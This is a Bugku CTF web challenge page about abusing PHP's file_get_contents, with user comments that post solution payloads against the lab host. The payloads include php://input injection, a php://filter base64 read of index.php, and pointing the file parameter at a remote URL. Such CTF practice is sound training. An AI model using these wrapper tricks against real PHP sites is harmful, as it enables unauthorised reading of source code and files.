file_get_contentsWEB 未解决
分数:
30
金币:
3
题目作者:
harry
一 血:
npfs
一血奖励:
2金币
解 决:
3230
提 示:
描 述:
file_get_contents????
评论
spiritboy 2年前
举报
伪协议作为fn秒出,呜我的金币。。。
Inf0 2年前
举报
rnm 退钱
落日星辰 2年前
举报
?ac=bugku&fn=flag.txt
夜雨 2年前
举报
向自己网站构造一个文本文件。只要内容和ac对应就行了 比如我的就是 /?ac=test&fn=https://yeyusmile.top/upload/test.txt
我赌你的枪里没有子弹 2年前
举报
index.php就能读取到,不用自己构造。
最爱吃兽奶 2年前
举报
方法1:http://114.67.175.224:10746/?ac=bugku&fn=flag.txt 方法2:http://114.67.175.224:10746/?ac=flag&fn=php://input,burp数据包里面加句flag就行 不蟹
我赌你的枪里没有子弹 2年前
举报
方法2:?fn=php://filter/read=convert.base64-encode/resource=index.php&ac=[index.php base64编码]
xiaosi429 2年前
举报
dirsearch
树木有点绿 2年前
举报
学到了
白猫a 1年前
举报
看到树神了
Z5bra 3年前
举报
补了下数据流和I/O模型,好题
陈江川0118 3年前
举报
以后做题看到file_get_contents函数就应该想到php://input协议
ximing 3年前
举报
主要考察 file_get_contents函数绕过,可以参考https://www.pianshen.com/article/24421724508/